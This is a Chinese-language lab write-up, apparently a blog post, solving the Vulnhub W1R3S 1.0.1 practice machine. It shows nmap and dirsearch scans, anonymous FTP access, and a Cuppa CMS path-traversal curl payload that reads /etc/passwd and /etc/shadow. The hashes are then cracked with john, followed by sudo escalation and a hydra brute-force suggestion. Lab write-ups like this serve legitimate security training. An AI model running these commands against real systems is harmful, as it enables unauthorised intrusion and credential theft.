Vulnhub W1R3S: 1.0.1

Vulnhub W1R3S: 1.0.1

0x01:端口扫描

主机发现,靶机ip:192.168.231.133

nmap -sn 192.168.231.0/24

-sn 仅主机扫描

/24 扫描c段

image-20241106192844984

详细全端口扫描

nmap -sT -sC -sV -O -p21,22,80,3306 192.168.231.133 -oA /root/scan/1/

-sT: 以TCP进行扫描;

-sC:使用 nmap 的默认脚本集合进行扫描

-sV:启用版本探测;

-O:启用操作系统探测

-p:指定端口

-oA:将扫描结果以三种格式(普通、XML、grepable)输出,并保存在 /root/scan/1/ 文件夹中。

image-20241106192815726

发现有4个服务,21ftp,22ssh,80http,3306mysql,而且ftp可以匿名登录

对web端口进行漏洞扫描

nmap --script=vuln -p80 192.168.231.133

--script=vuln 进行漏洞扫描

image-20241106193009426

有wordpress的login界面

0x02:ftp渗透

使用anonymous进行匿名登录

image-20241106193648409

提示我们使用binary模式去传输文件

image-20241106194247732

我们在content目录下找到有三个txt文件,我们全部get下来

我们再把其他目录的文件也get下来,我们依次看

image-20241106204835779

image-20241106204857437

image-20241107080451552

image-20241107080543889

image-20241107080659048

从以上图片中我们可以得知以下信息:

​ 1.得到两串字符串

​ 2.The W1R3S.inc

​ 3.一个hint

​ 4.员工名单

我们先分析02.txt中的字符串,使用hash-identifier识别出第一串为md5,第二串为base64

image-20241107083142244

image-20241107082858694

0x03:web渗透

首先扫目录

dirsearch -u http://192.168.231.133/

image-20241107083829728

扫到了之前的wordpress登录页,然后administrator有后台,我们继续扫admin子目录

dirsearch -u http://192.168.231.133/administrator

image-20241107085127910

我们再扫wordpress子目录

dirsearch -u http://192.168.231.133/wordpress

image-20241107085441824

我们现在就已经扫描到了以下几个有价值目录

/administrator/installation
/administrator/templates
/wordpress/wp-content/upgrade
/wordpress/wp-content/uploads
/wordpress/wp-login.php

我们进去一个一个看

image-20241107112114845

使用了cuppa CMS,查看漏洞

searchsploit cuppa
searchsploit -m php/webapps/25971.txt

image-20241107112545867

image-20241107112800448

image-20241107113127621

但是没回显,这怎么办呢,我们试试post传参或者curl呢

image-20241107114742586

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.231.133/administrator/alerts/alertConfigField.php

-s:让 curl 在执行过程中不输出任何进度信息或错误信息,只返回请求的结果。

--data-urlencode:表示将请求数据进行 URL 编码并以 POST 请求的形式发送。--data-urlencode 是对数据进行 URL 编码的选项,可以防止一些特殊字符(如 &? 等)干扰请求格式。

image-20241107193016442

看来两者都可以,我们看到w1r3s这个用户是可以登录的,那我们继续拿shadow

image-20241107193516256

然后我们unshadow它

unshadow passwd.txt shadow.txt > password.txt

最后john破解

john password.txt

image-20241107193639617

成功拿到密码!

0x04:权限提升

我们ssh登录到w1r3s用户下

查看权限

image-20241107194208674

无root权限,我们先看看sudo允许执行什么命令

sudo -l

image-20241107194821503

纳尼!提权后我们到root目录下查看

image-20241107194946331

0x05:思考补充

看了fyf大佬的wp后,做几个补充

1.john历史问题,使用--show即可

2.我们之前在ftp上get了员工名单,可以hydra爆破密码

posted @ 2024-11-13 18:23  kelec0ka  阅读(1)  评论(0编辑  收藏  举报